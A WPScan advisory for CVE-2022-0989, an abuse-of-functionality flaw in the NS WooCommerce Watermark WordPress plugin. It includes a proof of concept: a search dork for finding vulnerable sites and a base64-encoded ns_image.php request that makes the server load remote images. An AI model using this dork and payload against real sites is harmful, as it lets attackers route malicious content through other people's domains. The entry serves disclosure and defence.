WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

NS WooCommerce Watermark <= 2.11.3 - Abuse of Functionality

Description

An unprivileged user could use the functionality of the plugin to load images that hide malware for example from passing malicious domains to hide their trace, by making them pass through the vulnerable domain.

Proof of Concept

Search for a vulnerable domain with the dork: "/wp-content/plugins/ns-woocommerce-watermark"

Then go to the path and add: //ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0=

The param value can be modified by decoding it in base64: image_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&wt_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&other=


https://example.com/wp-content/plugins/ns-woocommerce-watermark/ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0=

Affects Plugins

ns-woocommerce-watermark
No known fix - plugin closed

References

CVE
CVE-2022-0989

Classification

Type

CONTENT INJECTION

OWASP top 10
A1: Injection
CWE
CWE-80

Miscellaneous

Original Researcher

Felipe Restrepo Rodríguez

Submitter

Felipe Restrepo Rodríguez

Submitter website
https://www.pfelilpe.com
Submitter twitter
Pfelilpe
Verified

Yes

WPVDB ID
a6bfc150-8e3f-4b2d-a6e1-09406af41dd4

Timeline

Publicly Published

2022-03-15 (about 2 months ago)

Added

2022-03-15 (about 2 months ago)

Last Updated

2022-04-09 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin